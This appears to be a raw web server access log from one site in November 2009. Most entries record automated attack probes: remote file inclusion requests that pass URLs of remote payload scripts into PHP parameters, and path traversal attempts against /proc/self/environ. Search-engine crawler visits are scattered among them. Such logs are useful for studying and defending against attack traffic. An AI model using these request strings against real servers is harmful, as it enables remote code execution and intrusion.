58.230.118.81 - - [01/Nov/2009:01:27:16 -0800] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:27:16 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:27:16 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:27:20 -0800] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:27:21 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:27:21 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:00 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:05 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:05 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:22 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:22 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:31:22 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:05 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:05 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:05 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:06 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:07 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:32:07 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
124.115.6.11 - - [01/Nov/2009:01:37:24 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "budapestcapital.com"
67.195.112.125 - - [01/Nov/2009:02:04:55 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:21 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:21 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:21 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:24 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:02:06:24 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
217.16.16.206 - - [01/Nov/2009:02:14:43 -0800] "GET /index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:18:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:18:17 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:18:18 -0800] "GET /skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:24:48 -0800] "GET /logs//admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:24:48 -0800] "GET /admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:24:49 -0800] "GET /logs/access_090329.log%20%20//admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:02:24:53 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://www.7806320.ru/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:02:24:53 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.7806320.ru/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.budapestcapital.com"
217.16.16.206 - - [01/Nov/2009:02:29:23 -0800] "GET /index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:30:02 -0800] "GET //appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:30:02 -0800] "GET /logs/access_090329.log%20%20///appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:30:02 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
217.16.16.206 - - [01/Nov/2009:02:30:37 -0800] "GET /index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
67.195.112.125 - - [01/Nov/2009:02:31:33 -0800] "GET /logs/?D=D HTTP/1.0" 200 3353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:07 -0800] "GET /skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:48 -0800] "GET /skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:48 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
210.114.222.32 - - [01/Nov/2009:02:36:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:37:13 -0800] "GET /logs/access_090329.log//admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
65.55.210.23 - - [01/Nov/2009:02:38:57 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.budapestcapital.com"
65.55.210.23 - - [01/Nov/2009:02:38:59 -0800] "GET /logs/access_090701.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:41:33 -0800] "GET /logs/access_090329.log/index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:41:33 -0800] "GET /index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:41:33 -0800] "GET /logs/index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:02:41:47 -0800] "GET /logs/access_090329.log///appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:42:00 -0800] "GET /logs/access.log/index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:42:26 -0800] "GET /logs/access_090329.log%20%20/index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.50 - - [01/Nov/2009:02:42:33 -0800] "GET /logs/access.log%20%20/index0.php?show=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
200.6.117.132 - - [01/Nov/2009:02:44:56 -0800] "GET /logs/access_090329.log///index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
200.6.117.132 - - [01/Nov/2009:02:44:56 -0800] "GET //index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
200.6.117.132 - - [01/Nov/2009:02:44:56 -0800] "GET /logs///index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:53 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:53 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:53 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:54 -0800] "GET /logs/access_090329.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:57 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:45:57 -0800] "GET /logs/access_090329.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:13 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:13 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:13 -0800] "GET /logs/access_090329.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:17 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:17 -0800] "GET /logs/access_090329.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:46:17 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
200.6.117.132 - - [01/Nov/2009:02:50:33 -0800] "GET //index.php?incl=http://www.laguiainteractiva.com.ar//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:51:40 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:51:45 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:51:46 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:52:05 -0800] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.169.141.50 - - [01/Nov/2009:02:52:07 -0800] "GET /logs/access_090329.log/video.php?content=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
81.169.141.50 - - [01/Nov/2009:02:52:07 -0800] "GET /video.php?content=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
81.169.141.50 - - [01/Nov/2009:02:52:08 -0800] "GET /logs/video.php?content=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:52:16 -0800] "GET /logs/access_090331.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:52:17 -0800] "GET /logs/access_090331.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:52:17 -0800] "GET /logs/access_090331.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:02:52:37 -0800] "GET /logs/access_090331.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.169.141.50 - - [01/Nov/2009:02:52:42 -0800] "GET /logs/access_090331.log/video.php?content=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:02:52:54 -0800] "GET /logs/access_090329.log//main.php?_zb_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:02:52:54 -0800] "GET /main.php?_zb_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:02:52:55 -0800] "GET /logs//main.php?_zb_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.budapestcapital.com"
81.169.141.50 - - [01/Nov/2009:02:56:32 -0800] "GET /logs/access_090329.log%20/video.php?content=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
112.78.14.2 - - [01/Nov/2009:03:34:26 -0800] "GET /logs/access_090329.log//ask_password.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
112.78.14.2 - - [01/Nov/2009:03:34:26 -0800] "GET /ask_password.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.195.112.125 - - [01/Nov/2009:03:38:29 -0800] "GET /logs/?S=D HTTP/1.0" 200 3353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:12:49 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:12:49 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:12:49 -0800] "GET /logs/access_090501.log//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:16:07 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:16:08 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:16:08 -0800] "GET /logs/access_090501.log%20%20//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:16:30 -0800] "GET /logs/access_090401.log%20%20//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:29:38 -0800] "GET /logs/access_090501.log%20%20//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:04:29:51 -0800] "GET /logs/access_090401.log%20%20//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:51:46 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:51:47 -0800] "GET /logs/access_090401.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:51:47 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:35 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:36 -0800] "GET /logs/access_090401.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:43 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:43 -0800] "GET /logs/access_090401.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:52:58 -0800] "GET /logs/access_090329.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:53:41 -0800] "GET /logs/access_090329.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:04:53:50 -0800] "GET /logs/access_090329.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:05:01:27 -0800] "GET /logs/access_090329.log//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.247.60.5 - - [01/Nov/2009:05:07:01 -0800] "GET /logs/access_090501.log//admin/business_inc/saveserver.php?thisdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
